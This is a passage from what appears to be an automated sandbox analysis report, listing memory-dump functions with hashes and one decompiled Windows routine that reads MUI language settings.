                                                              • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                              • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3FBE8, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                              • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                              • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                              • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3FB50, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                              • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                              • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                              • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3FC30, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                              • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                              • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                              • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A40C40, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                              • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                              • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                              • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3FC48, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                              • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                              • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                              • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A41D80, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                              • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                              • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                              • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3FD5C, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                              • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                              • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                              • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3FE24, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                              • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                              • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                              • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3FFFC, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                              • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                              • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                              • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A3FF34, Relevance: .0, Instructions: 6COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                              • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                              • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                              • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A68788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 94%
                                                              			E00A68788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00A68460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00A4E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00A6718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00A68460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00A6718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00A68460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00A68460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00A68460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00A6718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00A4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00A42340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00A5E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00A4E2A8(_t322,  &_v68, _v16);
								if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00A5E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00A4E2A8(_t322,  &_v68, _t236);
								if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00A6718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00A4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00A42340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00A5E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00A4E2A8(_v12,  &_v68, _v16);
							if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00A5E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00A4E2A8(_t322,  &_v68, _t269);
							if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00A6718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00A4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00A42340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00A5E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00A4E2A8(_v12,  &_v68, _v16);
						if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00A5E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00A4E2A8(_t322,  &_v68, _t296);
						if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                              0x00a68788
                                                              0x00a68788
                                                              0x00a68791
                                                              0x00a68794
                                                              0x00a68798
                                                              0x00a6879b
                                                              0x00a6879e
                                                              0x00a687a1
                                                              0x00a687a4
                                                              0x00a687a7
                                                              0x00a687aa
                                                              0x00a687af
                                                              0x00ab1ad3
                                                              0x00a68b0a
                                                              0x00a68b0d
                                                              0x00a68b13
                                                              0x00a68b19
                                                              0x00a68b1f
                                                              0x00a68b25
                                                              0x00a68b2b
                                                              0x00a68b31
                                                              0x00a68b37
                                                              0x00a68b3d
                                                              0x00a68b46
                                                              0x00a68b46
                                                              0x00a687c6
                                                              0x00a687d0
                                                              0x00ab1ae0
                                                              0x00ab1ae6
                                                              0x00ab1af8
                                                              0x00ab1af8
                                                              0x00ab1afd
                                                              0x00ab1afe
                                                              0x00ab1b01
                                                              0x00ab1b06
                                                              0x00ab1b06
                                                              0x00a687d6
                                                              0x00a687f2
                                                              0x00a687f7
                                                              0x00a68807
                                                              0x00a6880a
                                                              0x00a6880f
                                                              0x00a68810
                                                              0x00a68813
                                                              0x00a68818
                                                              0x00a68818
                                                              0x00a6882c
                                                              0x00a68831
                                                              0x00a68838
                                                              0x00a68908
                                                              0x00a68920
                                                              0x00a689f0
                                                              0x00a68a08
                                                              0x00a68af6
                                                              0x00a68af6
                                                              0x00a68af8
                                                              0x00a68afb
                                                              0x00ab1beb
                                                              0x00ab1beb
                                                              0x00a68b04
                                                              0x00ab1bf8
                                                              0x00ab1c0e
                                                              0x00ab1c13
                                                              0x00ab1c16
                                                              0x00ab1c16
                                                              0x00ab1bf8
                                                              0x00000000
                                                              0x00a68b04
                                                              0x00a68a0e
                                                              0x00a68a11
                                                              0x00a68a14
                                                              0x00a68a15
                                                              0x00a68a18
                                                              0x00a68a22
                                                              0x00a68b59
                                                              0x00a68a28
                                                              0x00a68a3c
                                                              0x00a68a3c
                                                              0x00a68a42
                                                              0x00ab1bb0
                                                              0x00ab1b11
                                                              0x00ab1b11
                                                              0x00000000
                                                              0x00a68a48
                                                              0x00a68a51
                                                              0x00a68a5b
                                                              0x00a68a5e
                                                              0x00a68a61
                                                              0x00a68a69
                                                              0x00a68a69
                                                              0x00a68a6d
                                                              0x00000000
                                                              0x00000000
                                                              0x00a68a74
                                                              0x00a68a7c
                                                              0x00a68a7d
                                                              0x00a68a91
                                                              0x00a68a93
                                                              0x00a68a93
                                                              0x00a68a98
                                                              0x00a68a9b
                                                              0x00a68aa1
                                                              0x00a68aa1
                                                              0x00a68aa4
                                                              0x00a68aaa
                                                              0x00a68ab1
                                                              0x00a68ac5
                                                              0x00a68ac7
                                                              0x00a68ac7
                                                              0x00a68ac5
                                                              0x00a68ace
                                                              0x00ab1bc9
                                                              0x00ab1bce
                                                              0x00ab1bd2
                                                              0x00ab1bd2
                                                              0x00a68ad8
                                                              0x00a68aeb
                                                              0x00a68aeb
                                                              0x00a68af0
                                                              0x00a68af4
                                                              0x00000000
                                                              0x00a68af4
                                                              0x00a68a42
                                                              0x00a68926
                                                              0x00a68929
                                                              0x00a6892c
                                                              0x00a6892d
                                                              0x00a68930
                                                              0x00a68935
                                                              0x00a6893a
                                                              0x00a68b51
                                                              0x00a68940
                                                              0x00a68954
                                                              0x00a68954
                                                              0x00a6895a
                                                              0x00ab1b63
                                                              0x00000000
                                                              0x00a68960
                                                              0x00a68969
                                                              0x00a68973
                                                              0x00a68976
                                                              0x00a68979
                                                              0x00a6897e
                                                              0x00a68981
                                                              0x00a68981
                                                              0x00a68986
                                                              0x00000000
                                                              0x00000000
                                                              0x00ab1b6e
                                                              0x00ab1b74
                                                              0x00ab1b7b
                                                              0x00ab1b8f
                                                              0x00ab1b91
                                                              0x00ab1b91
                                                              0x00ab1b99
                                                              0x00ab1b9c
                                                              0x00ab1ba2
                                                              0x00ab1ba2
                                                              0x00a6898c
                                                              0x00a68992
                                                              0x00a68999
                                                              0x00a689ad
                                                              0x00ab1ba8
                                                              0x00ab1ba8
                                                              0x00a689ad
                                                              0x00a689b6
                                                              0x00a689c8
                                                              0x00a689cd
                                                              0x00a689d0
                                                              0x00a689d0
                                                              0x00a689d6
                                                              0x00a689e8
                                                              0x00a689e8
                                                              0x00a689ed
                                                              0x00000000
                                                              0x00a689ed
                                                              0x00a6895a
                                                              0x00a6883e
                                                              0x00a68841
                                                              0x00a68844
                                                              0x00a68845
                                                              0x00a68848
                                                              0x00a6884d
                                                              0x00a68852
                                                              0x00a68b49
                                                              0x00a68858
                                                              0x00a6886c
                                                              0x00a6886c
                                                              0x00a68872
                                                              0x00ab1b0e
                                                              0x00000000
                                                              0x00a68878
                                                              0x00a68881
                                                              0x00a6888b
                                                              0x00a6888e
                                                              0x00a68891
                                                              0x00a68896
                                                              0x00a68899
                                                              0x00a68899
                                                              0x00a6889e
                                                              0x00000000
                                                              0x00000000
                                                              0x00ab1b21
                                                              0x00ab1b27
                                                              0x00ab1b2e
                                                              0x00ab1b42
                                                              0x00ab1b44
                                                              0x00ab1b44
                                                              0x00ab1b4c
                                                              0x00ab1b4f
                                                              0x00ab1b55
                                                              0x00ab1b55
                                                              0x00a688a4
                                                              0x00a688aa
                                                              0x00a688b1
                                                              0x00a688c5
                                                              0x00ab1b5b
                                                              0x00ab1b5b
                                                              0x00a688c5
                                                              0x00a688ce
                                                              0x00a688e0
                                                              0x00a688e5
                                                              0x00a688e8
                                                              0x00a688e8
                                                              0x00a688ee
                                                              0x00a68900
                                                              0x00a68900
                                                              0x00a68905
                                                              0x00000000
                                                              0x00a68905

                                                              APIs
                                                              Strings
                                                              • WindowsExcludedProcs, xrefs: 00A687C1
                                                              • Kernel-MUI-Number-Allowed, xrefs: 00A687E6
                                                              • Kernel-MUI-Language-SKU, xrefs: 00A689FC
                                                              • Kernel-MUI-Language-Allowed, xrefs: 00A68827
                                                              • Kernel-MUI-Language-Disallowed, xrefs: 00A68914
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
